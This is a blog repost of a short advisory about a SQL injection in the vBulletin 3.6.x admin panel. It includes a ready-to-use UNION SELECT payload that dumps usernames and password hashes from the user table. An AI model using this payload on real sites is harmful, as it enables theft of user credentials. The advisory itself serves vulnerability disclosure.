Jumat, 30 November 2012

meto5757/vbulletin-sql.txt

07.55  Aljinet  1 comment

Code
/****************************************/
 
CREDIT:
discovered by meto5757 and disfigure
 
PRODUCT:
vBulletin
http://www.vbulletin.com/
 
VULNERABILITY:
SQL Injection
 
NOTES:
- not a serious vulnerability, can only be used by administrator of site
- SQL injection can be used to obtain password hash
- tested on 3.6.4 and 3.6.5
 
POC:
1. Log in to admin panel
2. Go to Attachments->Search
3. Place the following string in the Attached Before field:
 
') union select 1,1,1,1,1,userid,password,1,username from user -- 9
 
greets: w4ck1ng.com
 
/****************************************

Posted in:

1 komentar:

Posting Komentar

pembaca yang baik selalu,memberi comentar yang baik pula,buat artikel aljinet ini,biar ada masukan lebih dan memgembangkan blog aljinet ini,untuk itu disarankan comentlah artikel kami,beri kritikan yang pedas tidak masalah,silakan di coment kawan

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More